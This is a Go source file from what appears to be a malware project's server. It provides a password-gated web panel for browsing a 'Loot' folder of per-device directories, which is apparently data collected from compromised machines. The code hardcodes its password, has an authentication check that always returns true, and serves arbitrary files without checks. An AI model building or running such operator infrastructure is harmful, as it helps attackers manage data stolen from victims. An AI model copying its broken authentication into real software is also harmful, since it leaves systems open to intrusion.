MalwareServer/loothandler.go

package main

import (
	"html/template"
	"io/ioutil"
	"log"
	"net/http"
	"path/filepath"
	"strings"
)

var (
	password = "hardcodedpassword"
	lootPath = "Loot"
)

type PageData struct {
	UIDs  []string
	Files []string
}

func main() {
	http.HandleFunc("/", loginHandler)
	http.HandleFunc("/loot", lootHandler)
	http.HandleFunc("/logout", logoutHandler)
	http.HandleFunc("/files/", fileHandler)

	log.Fatal(http.ListenAndServe(":8080", nil))
}

func loginHandler(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPost {
		renderTemplate(w, "login.html", nil)
		return
	}

	if r.FormValue("password") == password {
		http.Redirect(w, r, "/loot", http.StatusSeeOther)
		return
	}

	renderTemplate(w, "login.html", "Incorrect password")
}

func lootHandler(w http.ResponseWriter, r *http.Request) {
	if !isAuthenticated(r) {
		http.Redirect(w, r, "/", http.StatusSeeOther)
		return
	}

	uids, err := getDeviceUIDs()
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}

	data := PageData{UIDs: uids}
	renderTemplate(w, "loot.html", data)
}

func fileHandler(w http.ResponseWriter, r *http.Request) {
	requestedPath := strings.TrimPrefix(r.URL.Path, "/files/")
	filePath := filepath.Join(lootPath, requestedPath)
	http.ServeFile(w, r, filePath)
}

func logoutHandler(w http.ResponseWriter, r *http.Request) {
	http.Redirect(w, r, "/", http.StatusSeeOther)
}

func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {
	t, err := template.ParseFiles(tmpl)
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
	t.Execute(w, data)
}

func isAuthenticated(r *http.Request) bool {
	return true
}

func getDeviceUIDs() ([]string, error) {
	var uids []string
	files, err := ioutil.ReadDir(lootPath)
	if err != nil {
		return nil, err
	}
	for _, file := range files {
		if file.IsDir() {
			uids = append(uids, file.Name())
		}
	}
	return uids, nil
}